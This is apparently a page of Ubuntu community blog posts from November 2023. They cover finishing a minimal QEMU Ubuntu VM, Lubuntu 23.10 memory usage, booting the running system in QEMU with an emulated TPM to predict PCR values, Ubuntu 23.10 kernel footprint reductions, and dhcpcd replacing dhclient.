Refer to the qemu-system-x86_64 manpage or QEMU Invocation documentation page at https://www.qemu.org/docs/master/system/invocation.html for more info on what all these options do. Basically this gives you a VM with 4 GB RAM, 2 CPU cores, decent graphics (not 3d accelerated but not as bad as plain VGA), and audio support. You can tweak the amount of RAM and number of CPU cores by changing the -m and -smp parameters respectively. You’ll have access to the QEMU monitor through whatever terminal you run the launcher script in, allowing you to do things like switch to a different TTY, insert and remove devices and storage media on the fly, and things like that.

Finally, it’s time to see if it works.

chmod +x ./startVM.sh
./startVM.sh

If all goes well, the VM should boot and you should be able to log in! If you installed IceWM and its accompanying software like mentioned earlier, try running startx once you log in. This should pop open a functional IceWM desktop.

Some other things you should test once you’re logged in:

  • Do you have Internet access? ping -c1 8.8.8.8 can be used to test. If you don’t have Internet, run sudo nmtui in a terminal and add a new Ethernet network within the VM, then try activating it. If you get an error about the Ethernet device being strictly unmanaged, you probably forgot to remove the /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf file mentioned earlier.

  • Can you write anything to the drive? Try running touch test to make sure. If you can’t, you probably forgot to create the /etc/fstab file.

If either of these things don’t work, you can power off the VM, then re-attach the VM’s virtual disk to your host machine, mount it, and chroot in like this:

sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img
sudo mount /dev/nbd0p1 ./vdisk
sudo chroot vdisk

Since all you’ll be doing is writing or removing a file, you don’t need to bind mount all the special directories we had to work with earlier.

Once you’re done fixing whatever is wrong, you can exit the VM, unmount and detach its disk, and then try to boot it again like this:

exit
sudo umount vdisk
sudo qemu-nbd -d /dev/nbd0
./startVM.sh

You now have a fully functional, minimal VM! Some extra tips that you may find handy:

  • If you choose to install an SSH server into your VM, you can use the “hostfwd” setting in QEMU to forward a port on your local machine to port 22 within the VM. This will allow you to SSH into the VM. Add a parameter like -nic user,hostfwd=tcp:127.0.0.1:2222-:22 to your QEMU command in the “startVM.sh” script. This will forward port 2222 of your host machine to port 22 of the VM. Then you can SSH into the VM by running ssh user@127.0.0.1 -p 2222. The “hostfwd” QEMU feature is documented at https://www.qemu.org/docs/master/system/invocation.html - just search the page for “hostfwd” to find it.

  • If you intend to use the VM through SSH only and don’t want a QEMU window at all, remove the following three parameters from the QEMU command in “startVM.sh”:

    • -vga qxl

    • -display sdl

    • -monitor stdio

    Then add the following switch:

    • -nographic

    This will disable the graphical QEMU window entirely and provide no video hardware to the VM.

  • You can disable sound support by removing the following switches from the QEMU command in “startVM.sh”:

    • -device intel-hda

    • -device hda-duplex

There’s lots more you can do with QEMU and manual Ubuntu installations like this, but I think this should give you a good start. Hope you find this useful! God bless.

Thanks for reading Arraybolt's Archives! Subscribe for free to receive new posts and support my work.

on November 30, 2023 10:34 PM

November 25, 2023

In 2020 I reviewed LiveCD memory usage.

I was hoping to review either Wayland only or immutable only (think ostree/flatpak/snaps etc) but for various reasons on my setup it would just be a Gnome compare and that's just not as interesting. There are just to many distros/variants for me to do a full followup.

Lubuntu has previously always been the winner, so let's just see how Lubuntu 23.10 is doing today.

Previously in 2020 Lubuntu needed to get to 585 MB to be able to run something with a livecd. With a fresh install today Lubuntu can still launch Qterminal with just 540 MB of RAM (not apples to apples, but still)! And that's without Zram that it had last time.

I decided to try removing some parts of the base system to see the cost of each component (with 10MB accuracy). I disabled networking to try and make it a fairer compare.

  • Snapd - 30 MiB
  • Printing - cups foomatic - 10 MiB
  • rsyslog/crons - 10 MiB

Rsyslog impact

Out of the 3 above it's felt more like with rsyslog (and cron) are redundant in modern Linux with systemd. So I tried hitting the log system to see if we could get a slowdown, by every .1 seconds having a service echo lots of gibberish.

After an hour of uptime, this is how much space was used:

  • syslog 575M
  • journal at 1008M

CPU Usage on fresh boot after:

With Rsyslog

  • gibberish service was at 1% CPU usage
  • rsyslog was at 2-3%
  • journal was at ~4%

Without Rsyslog

  • gibberish service was at 1% CPU usage
  • journal was at 1-3%

That's a pretty extreme case, but does show some impact of rsyslog, which in most desktop settings is redundant anyway.

Testing notes:

  • 2 CPUs (Copy host config)
  • Lubuntu 23.10 install
  • no swap file
  • ext4, no encryption
  • login automatically
  • Used Virt-manager and only default change was enabling EUFI
on November 25, 2023 02:42 AM

November 19, 2023

In this article I will show you how to start your current operating system inside a virtual machine. That is: launching the operating system (with all your settings, files, and everything), inside a virtual machine, while you’re using it.

This article was written for Ubuntu, but it can be easily adapted to other distributions, and with appropriate care it can be adapted to non-Linux kernels and operating systems as well.

Motivation

Before we start, why would a sane person want to do this in the first place? Well, here’s why I did it:

  • To test changes that affect Secure Boot without a reboot.

    Recently I was doing some experiments with Secure Boot and the Trusted Platform Module (TPM) on a new laptop, and I got frustrated by how time consuming it was to test changes to the boot chain. Every time I modified a file involved during boot, I would need to reboot, then log in, then re-open my terminal windows and files to make more modifications… Plus, whenever I screwed up, I would need to manually recover my system, which would be even more time consuming.

    I thought that I could speed up my experiments by using a virtual machine instead.

  • To predict the future TPM state (in particular, the values of PCRs 4, 5, 8, and 9) after a change, without a reboot.

    I wanted to predict the values of my TPM PCR banks after making changes to the bootloader, kernel, and initrd. Writing a script to calculate the PCR values automatically is in principle not that hard (and I actually did it before, in a different context), but I wanted a robust, generic solution that would work on most systems and in most situations, and emulation was the natural choice.

  • And, of course, just for the fun of it!

To be honest, I’m not a big fan of Secure Boot. The reason why I’ve been working on it is simply that it’s the standard nowadays and so I have to stick with it. Also, there are no real alternatives out there to achieve the same goals. I’ll write an article about Secure Boot in the future to explain the reasons why I don’t like it, and how to make it work better, but that’s another story…

Procedure

The procedure that I’m going to describe has 3 main steps:

  1. create a copy of your drive
  2. emulate a TPM device using swtpm
  3. emulate the system with QEMU

I’ve tested this procedure on Ubuntu 23.04 (Lunar) and 23.10 (Mantic), but it should work on any Linux distribution with minimal adjustments. The general approach can be used for any operating system, as long as appropriate replacements for QEMU and swtpm exist.

Prerequisites

Before we can start, we need to install:

  • QEMU: a virtual machine emulator
  • swtpm: a TPM emulator
  • OVMF: a UEFI firmware implementation

On a recent version of Ubuntu, these can be installed with:

sudo apt install qemu-system-x86 ovmf swtpm

Note that OVMF only supports the x86_64 architecture, so we can only emulate that. If you run a different architecture, you’ll need to find another UEFI implementation that is not OVMF (but I’m not aware of any freely available ones).

Create a copy of your drive

We can decide to either:

  • Choice #1: run only the components involved early at boot (shim, bootloader, kernel, initrd). This is useful if you, like me, only need to test those components and how they affect Secure Boot and the TPM, and don’t really care about the rest (the init process, login manager, …).

  • Choice #2: run the entire operating system. This can give you a fully usable operating system running inside the virtual machine, but may also result in some instability inside the guest (because we’re giving it a filesystem that is in use), and may also lead to some data loss if we’re not careful and make typos. Use with care!

Choice #1: Early boot components only

If we’re interested in the early boot components only, then we need to make a copy the following from our drive: the GPT partition table, the EFI partition, and the /boot partition (if we have one). Usually all these 3 pieces are at the “start” of the drive, but this is not always the case.

To figure out where the partitions are located, run:

sudo parted -l

On my system, this is the output:

Model: WD_BLACK SN750 2TB (nvme)
Disk /dev/nvme0n1: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number  Start   End     Size    File system  Name  Flags
 1      1049kB  525MB   524MB   fat32              boot, esp
 2      525MB   1599MB  1074MB  ext4
 3      1599MB  2000GB  1999GB                     lvm

In my case, the partition number 1 is the EFI partition, and the partition number 2 is the /boot partition. If you’re not sure what partitions to look for, run mount | grep -e /boot -e /efi. Note that, on some distributions (most notably the ones that use systemd-boot), a /boot partition may not exist, so you can leave that out in that case.

Anyway, in my case, I need to copy the first 1599 MB of my drive, because that’s where the data I’m interested in ends: those first 1599 MB contain the GPT partition table (which is always at the start of the drive), the EFI partition, and the /boot partition.

Now that we have identified how many bytes to copy, we can copy them to a file named drive.img with dd (maybe after running sync to make sure that all changes have been committed):

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead),
# and 'count' with the number of MBs to copy
sync && sudo -g disk dd if=/dev/nvme0n1 of=drive.img bs=1M count=1599 conv=sparse

Choice #2: Entire system

If we want to run our entire system in a virtual machine, then I would recommend creating a QEMU copy-on-write (COW) file:

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead)
sudo -g disk qemu-img create -f qcow2 -b /dev/nvme0n1 -F raw drive.qcow2

This will create a new copy-on-write image using /dev/nvme0n1 as its “backing storage”. Be very careful when running this command: you don’t want to mess up the order of the arguments, or you might end up writing to your storage device (leading to data loss)!

The advantage of using a copy-on-write file, as opposed to copying the whole drive, is that this is much faster. Also, if we had to copy the entire drive, we might not even have enough space for it (even when using sparse files).

The big drawback of using a copy-on-write file is that, because our main drive likely contains filesystems that are mounted read-write, any modification to the filesystems on the host may be perceived as data corruption on the guest, and that in turn may cause all sort of bad consequences inside the guest, including kernel panics.

Another drawback is that, with this solution, later we will need to give QEMU permission to read our drive, and if we’re not careful enough with the commands we type (e.g. we swap the order of some arguments, or make some typos), we may potentially end up writing to the drive instead.

Emulate a TPM device using swtpm

There are various ways to run the swtpm emulator. Here I will use the “vTPM proxy” way, which is not the easiest, but has the advantage that the emulated device will look like a real TPM device not only to the guest, but also to the host, so that we can inspect its PCR banks (among other things) from the host using familiar tools like tpm2_pcrread.

First, enable the tpm_vtpm_proxy module (which is not enabled by default on Ubuntu):

sudo modprobe tpm_vtpm_proxy

If that worked, we should have a /dev/vtpmx device. We can verify its presence with:

ls /dev/vtpmx

swtpm in “vTPM proxy” mode will interact with /dev/vtpmx, but in order to do so it needs the sys_admin capability. On Ubuntu, swtpm ships with this capability explicitly disabled by AppArmor, but we can enable it with:

sudo sh -c "echo '  capability sys_admin,' > /etc/apparmor.d/local/usr.bin.swtpm"
systemctl reload apparmor

Now that /dev/vtpmx is present, and swtpm can talk to it, we can run swtpm in “vTPM proxy” mode:

sudo mkdir /tpm/swtpm-state
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2

Upon start, swtpm should create a new /dev/tpmN device and print its name on the terminal. On my system, I already have a real TPM on /dev/tpm0, and therefore swtpm allocates /dev/tpm1.

The emulated TPM device will need to be readable and writeable by QEMU, but the emulated TPM device is by default accessible only by root, so either we run QEMU as root (not recommended), or we relax the permissions on the device:

# replace '/dev/tpm1' with the device created by swtpm
sudo chmod a+rw /dev/tpm1

Make sure not to accidentally change the permissions of your real TPM device!

Emulate the system with QEMU

Inside the QEMU emulator, we will run the OVMF UEFI firmware. On Ubuntu, the firmware comes in 2 flavors:

  • with Secure Boot enabled (/usr/share/OVMF/OVMF_CODE_4M.ms.fd), and
  • with Secure Boot disabled (in /usr/share/OVMF/OVMF_CODE_4M.fd)

(There are actually even more flavors, see this AskUbuntu question for the details.)

In the commands that follow I’m going to use the Secure Boot flavor, but if you need to disable Secure Boot in your guest, just replace .ms.fd with .fd in all the commands below.

To use OVMF, first we need to copy the EFI variables to a file that can be read & written by QEMU:

cp /usr/share/OVMF/OVMF_VARS_4M.ms.fd /tmp/

This file (/tmp/OVMF_VARS_4M.ms.fd) will be the equivalent of the EFI flash storage, and it’s where OVMF will read and store its configuration, which is why we need to make a copy of it (to avoid modifications to the original file).

Now we’re ready to run QEMU:

  • If you copied only the early boot files (choice #1):

    # replace '/dev/tpm1' with the device created by swtpm
    qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=raw,file=drive.img \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    
  • If you have a copy-on-write file for the entire system (choice #2):

    # replace '/dev/tpm1' with the device created by swtpm
    sudo -g disk qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=qcow2,file=drive.qcow2 \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    

    Note that this last command makes QEMU run as the disk group: on Ubuntu, this group has the permission to read and write all storage devices, so be careful when running this command, or you risk losing your files forever! If you want to add more safety, you may consider using an ACL to give the user running QEMU read-only permission to your backing storage.

In either case, after launching QEMU, our operating system should boot… while running inside itself!

In some circumstances though it may happen that the wrong operating system is booted, or that you end up at the EFI setup screen. This can happen if your system is not configured to boot from the “first” EFI entry listed in the EFI partition. Because the boot order is not recorded anywhere on the storage device (it’s recorded in the EFI flash memory), of course OVMF won’t know which operating system you intended to boot, and will just attempt to launch the first one it finds. You can use the EFI setup screen provided by OVMF to change the boot order in the way you like. After that, changes will be saved into the /tmp/OVMF_VARS_4M.ms.fd file on the host: you should keep a copy of that file so that, next time you launch QEMU, you’ll boot directly into your operating system.

Reading PCR banks after boot

Once our operating system has launched inside QEMU, and after the boot process is complete, the PCR banks will be filled and recorded by swtpm.

If we choose to copy only the early boot files (choice #1), then of course our operating system won’t be fully booted: it’ll likely hang waiting for the root filesystem to appear, and may eventually drop to the initrd shell. None of that really matters if all we want is to see the PCR values stored by the bootloader.

Before we can extract those PCR values, we first need to stop QEMU (Ctrl-C is fine), and then we can read it with tpm2_pcrread:

# replace '/dev/tpm1' with the device created by swtpm
tpm2_pcrread -T device:/dev/tpm1

Using the method described here in this article, PCRs 4, 5, 8, and 9 inside the emulated TPM should match the PCRs in our real TPM. And here comes an interesting application of this method: if we upgrade our bootloader or kernel, and we want to know the future PCR values that our system will have after reboot, we can simply follow this procedure and obtain those PCR values without shutting down our system! This can be especially useful if we use TPM sealing: we can reseal our secrets and make them unsealable at the next reboot without trouble.

Restarting the virtual machine

If we want to restart the guest inside the virtual machine, and obtain a consistent TPM state every time, we should start from a “clean” state every time, which means:

  1. restart swtpm
  2. recreate the drive.img or drive.qcow2 file
  3. launch QEMU again

If we don’t restart swtpm, the virtual TPM state (and in particular the PCR banks) won’t be cleared, and new PCR measurements will simply be added on top of the existing state. If we don’t recreate the drive file, it’s possible that some modifications to the filesystems will have an impact on the future PCR measurements.

We don’t necessarily need to recreate the /tmp/OVMF_VARS_4M.ms.fd file every time. In fact, if you need to modify any EFI setting to make your system bootable, you might want to preserve it so that you don’t need to change EFI settings at every boot.

Automating the entire process

I’m (very slowly) working on turning this entire procedure into a script, so that everything can be automated. Once I find some time I’ll finish the script and publish it, so if you liked this article, stay tuned, and let me know if you have any comment/suggestion/improvement/critique!

on November 19, 2023 04:33 PM

November 16, 2023


Photo by Pixabay

Ubuntu systems typically have up to 3 kernels installed, before they are auto-removed by apt on classic installs. Historically the installation was optimized for metered download size only. However, kernel size growth and usage no longer warrant such optimizations. During the 23.10 Mantic Minatour cycle, I led a coordinated effort across multiple teams to implement lots of optimizations that together achieved unprecedented install footprint improvements.

Given a typical install of 3 generic kernel ABIs in the default configuration on a regular-sized VM (2 CPU cores 8GB of RAM) the following metrics are achieved in Ubuntu 23.10 versus Ubuntu 22.04 LTS:

  • 2x less disk space used (1,417MB vs 2,940MB, including initrd)

  • 3x less peak RAM usage for the initrd boot (68MB vs 204MB)

  • 0.5x increase in download size (949MB vs 600MB)

  • 2.5x faster initrd generation (4.5s vs 11.3s)

  • approximately the same total time (103s vs 98s, hardware dependent)


For minimal cloud images that do not install either linux-firmware or modules extra the numbers are:

  • 1.3x less disk space used (548MB vs 742MB)

  • 2.2x less peak RAM usage for initrd boot (27MB vs 62MB)

  • 0.4x increase in download size (207MB vs 146MB)


Hopefully, the compromise of download size, relative to the disk space & initrd savings is a win for the majority of platforms and use cases. For users on extremely expensive and metered connections, the likely best saving is to receive air-gapped updates or skip updates.


This was achieved by precompressing kernel modules & firmware files with the maximum level of Zstd compression at package build time; making actual .deb files uncompressed; assembling the initrd using split cpio archives - uncompressed for the pre-compressed files, whilst compressing only the userspace portions of the initrd; enabling in-kernel module decompression support with matching kmod; fixing bugs in all of the above, and landing all of these things in time for the feature freeze. Whilst leveraging the experience and some of the design choices implementations we have already been shipping on Ubuntu Core. Some of these changes are backported to Jammy, but only enough to support smooth upgrades to Mantic and later. Complete gains are only possible to experience on Mantic and later.


The discovered bugs in kernel module loading code likely affect systems that use LoadPin LSM with kernel space module uncompression as used on ChromeOS systems. Hopefully, Kees Cook or other ChromeOS developers pick up the kernel fixes from the stable trees. Or you know, just use Ubuntu kernels as they do get fixes and features like these first.


The team that designed and delivered these changes is large: Benjamin Drung, Andrea Righi, Juerg Haefliger, Julian Andres Klode, Steve Langasek, Michael Hudson-Doyle, Robert Kratky, Adrien Nader, Tim Gardner, Roxana Nicolescu - and myself Dimitri John Ledkov ensuring the most optimal solution is implemented, everything lands on time, and even implementing portions of the final solution.


Hi, It's me, I am a Staff Engineer at Canonical and we are hiring https://canonical.com/careers.


Lots of additional technical details and benchmarks on a huge range of diverse hardware and architectures, and bikeshedding all the things below:


For questions and comments please post to Kernel section on Ubuntu Discourse.



on November 16, 2023 10:45 AM

A lot of time has passed since my previous post on my work to make dhcpcd the drop-in replacement for the deprecated ISC dhclient a.k.a. isc-dhcp-client. Current status:

  • Upstream now regularly produces releases and with a smaller delta than before. This makes it easier to track possible breakage.
  • Debian packaging has essentially remained unchanged. A few Recommends were shuffled, but that's about it.
  • The only remaining bug is fixing the build for Hurd. Patches are welcome. Once that is fixed, bumping dhcpcd-base's priority to important is all that's left.
on November 16, 2023 09:38 AM